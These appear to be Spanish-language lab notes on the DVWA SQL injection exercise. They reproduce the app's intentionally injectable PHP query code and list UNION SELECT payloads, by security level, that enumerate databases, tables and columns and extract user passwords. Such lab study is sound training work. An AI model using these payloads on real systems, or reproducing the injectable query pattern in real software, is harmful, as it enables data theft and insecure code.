SQL Injection

Low Security Level

No tiene medida de seguridad.

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

LISTAR BASE DE DATOS:

a' UNION SELECT schema_name, "2" FROM information_schema.schemata;-- -

LISTAR TABLAS:

a' UNION SELECT table_name, "2" FROM information_schema.tables; -- -

LISTAR COLUMNAS:

a' UNION SELECT column_name, "2 FROM information_schema.columns;-- -

LISTAR USUARIOS:

a' UNION SELECT first_name, password FROM dvwa.users; -- -

Medium Security Level

  • (CON BURSUITE)

LISTAR BASE DE DATOS:

id= 1 UNION SELECT schema_name, version() FROM information_schema.schemata;- -

LISTAR TABLAS:

id= 1 UNION SELECT table_name, version() FROM information_schema.tables;- -

LSITAR COLUMNAS:

id= 1 UNION SELECT column_name, version() FROM information_schema.columns;- -

LISTAR USUARIOS:

id= 1 UNION SELECT user, password FROM dvwa.users;- -

High Security Level

SIMILAR al Low Security Level.

LISTAR BASE DE DATOS:

a' UNION SELECT schema_name, "2" FROM information_schema.schemata;-- -

LISTAR TABLAS:

a' UNION SELECT table_name, "2" FROM information_schema.tables; -- -

LSITAR COLUMNAS:

a' UNION SELECT column_name, "2 FROM information_schema.columns;-- -

LISTAR USUARIOS:

a' UNION SELECT first_name, password FROM dvwa.users; -- -

Impossible Security Level

Última actualización